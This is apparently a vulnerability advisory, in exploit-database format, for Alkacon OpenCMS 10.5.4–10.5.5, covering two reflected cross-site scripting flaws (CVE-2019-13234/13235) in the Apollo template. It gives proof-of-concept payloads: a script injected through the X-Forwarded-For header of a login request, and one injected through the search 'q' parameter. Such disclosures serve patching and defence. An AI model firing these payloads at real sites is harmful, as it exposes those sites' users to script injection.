vendor:
OpenCMS
by:
Aetsu
6.1
CVSS
MEDIUM
Multiple XSS
79
CWE
Product Name: OpenCMS
Affected Version From: 10.5.4
Affected Version To: 10.5.5
Patch Exists: YES
Related CWE: CVE-2019-13234, CVE-2019-13235
CPE: a:alkacon:opencms:10.5.5
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: 10.5.5 / 10.5.4
2019
Alkacon OpenCMS 10.5.x – Multiple XSS in Apollo Template
The vulnerability appears when the header X-Forwarded-For is used as shown in the next request: GET /login/index.html?requestedResource=&name=Editor&password=editor&action=login HTTP/1.1 Host: example.com X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja Reflected XSS in the search engine: Affected resource -> 'q' POC: https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
Mitigation:
The user should not use the X-Forwarded-For header in the request and should not use the vulnerable search engine.
